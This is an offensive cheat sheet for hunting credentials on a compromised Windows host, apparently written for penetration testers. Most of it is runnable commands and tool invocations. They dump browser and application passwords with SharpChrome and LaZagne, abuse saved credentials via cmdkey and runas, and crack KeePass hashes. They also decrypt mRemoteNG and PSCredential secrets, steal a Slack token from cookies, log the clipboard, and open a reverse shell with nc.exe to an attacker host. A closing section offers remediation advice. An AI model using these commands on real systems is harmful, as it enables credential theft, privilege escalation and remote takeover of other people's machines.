🛡️ Methodology Checklist
- Filesystem search:
findstr /SIM /C:"password" *.txt *.xml *.ini *.config 2>nul - PowerShell history:
(Get-PSReadLineOption).HistorySavePaththen read the file - Credential Manager:
cmdkey /list— if entries exist:runas /savecred /user:[USER] cmd - Chrome custom dictionary:
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Custom Dictionary.txt - KeePass databases:
Get-ChildItem -Recurse -Filter *.kdbx -ErrorAction SilentlyContinue - KeePass hash:
keepass2john database.kdbx > hash.txt; hashcat -m 13400 hash.txt [wordlist] - mRemoteNG:
%APPDATA%\mRemoteNG\confCons.xml→ default key:mR3m - Run LaZagne:
LaZagne.exe all
🎯 Operational Context
Use when: Windows shell obtained — hunt credentials in registry, PowerShell history, web.config, unattend.xml, SAM, credential manager, and sticky notes.
Think Dumber First: type C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt and reg query HKLM /f password /t REG_SZ /s — run these two immediately. PowerShell history is consistently the highest-yield credential source on Windows workstations.
Skip when: Already have SYSTEM — dump LSASS directly instead of hunting files.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Recursive file-based password search |
(Get-PSReadLineOption).HistorySavePath | Get PowerShell command history file path |
type [HISTORY_PATH]\ConsoleHost_history.txt | Read PowerShell history — often contains plaintext creds |
$Credential = Import-Clixml -Path C:\[PATH]\creds.xml; $Credential.GetNetworkCredential().Password | Decrypt PSCredential XML if you own the same user |
cmdkey /list | Saved Windows credentials — check for admin/service accounts |
runas /savecred /user:[DOMAIN]\[USER] cmd.exe | Use saved credential without knowing password |
.\SharpChrome.exe logins | Decrypt Chrome saved passwords (requires same user context) |
.\KeePassXC.exe; keepass2john Database.kdbx > hash.txt | Extract KeePass hash for cracking |
hashcat -a 0 -m 13400 hash.txt rockyou.txt | Crack KeePass hash |
.\LaZagne.exe all | LaZagne — dump creds from all installed applications |
.\SessionGopher.ps1; Invoke-SessionGopher -Thorough | SessionGopher — extract PuTTY/WinSCP/RDP saved sessions |
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | AutoLogon credentials in registry |
netsh wlan show profile name="[SSID]" key=clear | View Wi-Fi password in cleartext |
.\mremoteng_decrypt.py -s [ENCRYPTED_STRING] | Decrypt mRemoteNG saved passwords (default key: mR3m) |
Invoke-ClipboardLogger | Monitor clipboard for credential paste events |
🔬 Deep Dive & Workflow
File-Based Credential Search
# Recursive search across common file types
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
# Specific directories
findstr /SIM /C:"password" C:\inetpub\*.config # IIS web.config
findstr /SIM /C:"password" C:\xampp\*.ini # XAMPP configs
findstr /SIM /C:"password" C:\Users\*\*.txt # User files
# Chrome saved password dictionary (cleartext plaintext hints)
gc 'C:\Users\[USER]\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
# Unattend files (post-imaging credentials)
C:\unattend.xml
C:\Windows\Panther\unattend.xml
C:\Windows\system32\sysprep\unattend.xmlPowerShell History
# Find history path
(Get-PSReadLineOption).HistorySavePath
# → C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Read it
type "C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Search for patterns
gc "...\ConsoleHost_history.txt" | Select-String "password\|cred\|securestring\|-pass"PSCredential CLIXML Decrypt
# Credential XML only decryptable by the account that encrypted it (DPAPI)
# Must be running as the same user who created it
$Credential = Import-Clixml -Path "C:\scripts\creds.xml"
$Credential.GetNetworkCredential().UserName
$Credential.GetNetworkCredential().Password
# If you have that user's shell → decrypt inline:
(Import-Clixml C:\creds.xml).GetNetworkCredential().PasswordSaved Credentials (cmdkey + runas)
# List saved creds
cmdkey /list
# → Target: Domain:interactive=SERVER\Administrator
# → Credentials: Username = Administrator
# Password = (saved)
# Use saved credential without knowing the password
runas /savecred /user:DOMAIN\Administrator "cmd.exe /c whoami > C:\temp\out.txt"
runas /savecred /user:SERVER\Administrator "cmd.exe /c nc.exe [LHOST] [LPORT] -e cmd.exe"Browser Credentials
# Chrome (requires user context — uses DPAPI)
.\SharpChrome.exe logins
# → dumps username, URL, plaintext password
# Firefox (SQLite-based, more portable)
# Copy profile dir + decrypt with firefox_decrypt.py on Kali
Copy-Item -Recurse "$env:APPDATA\Mozilla\Firefox\Profiles" C:\temp\ffprofiles
# → on Kali: python3 firefox_decrypt.py ffprofiles/[PROFILE]
# Steal Slack token via Chrome cookies
# Find cookies DB:
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" C:\temp\cookies.db
# → sqlite3 + DPAPI decrypt → Slack token for org accessAutoLogon Registry Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for:
# DefaultUserName = [USER]
# DefaultPassword = [PASS] ← plaintext!
# DefaultDomain = [DOMAIN]mRemoteNG Saved Passwords
# Config file location (default)
C:\Users\[USER]\AppData\Roaming\mRemoteNG\confCons.xml
# Contains encrypted passwords with default key "mR3m"
# Decrypt with:
python3 mremoteng_decrypt.py -s "[ENCRYPTED_STRING_FROM_XML]"
# → -k [CUSTOM_KEY] if mRemoteNG configured with custom master password
# Find all encrypted strings:
Select-String -Path confCons.xml -Pattern "Password="LaZagne — Application Credential Dump
# Dump all application credentials
.\LaZagne.exe all
# Specific categories
.\LaZagne.exe windows # LSA secrets, cached creds
.\LaZagne.exe browsers # Chrome, Firefox, IE
.\LaZagne.exe sysadmin # WinSCP, FileZilla, PuTTY
.\LaZagne.exe databases # SQLite, MySQL config files
.\LaZagne.exe git # Git credentials
.\LaZagne.exe mail # Thunderbird, OutlookWi-Fi Credentials
# List saved profiles
netsh wlan show profiles
# Show password for specific profile
netsh wlan show profile name="[SSID]" key=clear
# → Key Content: [PLAINTEXT_PASSPHRASE]Clipboard Monitoring
# Run cliplogger and wait for user to paste credentials
Import-Module .\Invoke-ClipboardLogger.ps1
Invoke-ClipboardLogger
# → Logs clipboard every second — catch password manager pastesRestic Backup Repository Attack
# Find restic repos on system or network
Get-ChildItem -Path C:\ -Recurse -Include "config" 2>$null | Select-String "pack-version"
# If you have the repo password:
restic -r [REPO_PATH] snapshots
restic -r [REPO_PATH] restore latest --target C:\temp\restore
# Backups may contain SAM, SYSTEM, NTDS.dit, credential files
# Even partial restores of sensitive dirs are valuable🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PowerShell history empty | PSReadLine not installed or history cleared | Check: Get-PSReadlineOption for actual history path; also check %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ |
| reg query too slow | Large registry | Focus: HKLM\SOFTWARE\, HKCU\SOFTWARE\, and HKLM\SYSTEM\ for stored passwords |
| unattend.xml not found | Not a freshly imaged system | Check all: dir /s /b C:\unattend.xml C:\sysprep.xml C:\Windows\Panther\unattend.xml |
| LaZagne not running | AV blocks execution | Use manual checks instead; LaZagne is commonly flagged; extract individual browser stores manually |
| Sticky notes not accessible | Locked database | Path: %LOCALAPPDATA%\Packages\Microsoft.MicrosoftStickyNotes_*\LocalState\plum.sqlite — use SQLite reader |
📝 Reporting Trigger
Finding Title: Credentials Found in Windows System Files and Registry Impact: Plaintext credentials stored in PowerShell history, unattend.xml, web.config, or Windows registry allow privilege escalation or lateral movement without additional exploitation, providing authenticated access to additional systems. Root Cause: Credentials stored in plaintext in accessible locations due to poor secrets management practices. Automated deployment scripts storing credentials in unattend.xml without post-deployment cleanup. Recommendation: Implement secrets management (Azure Key Vault, CyberArk). Remove unattend.xml after deployment. Clear PowerShell history on shared systems. Restrict web.config access. Use LAPS for local admin passwords.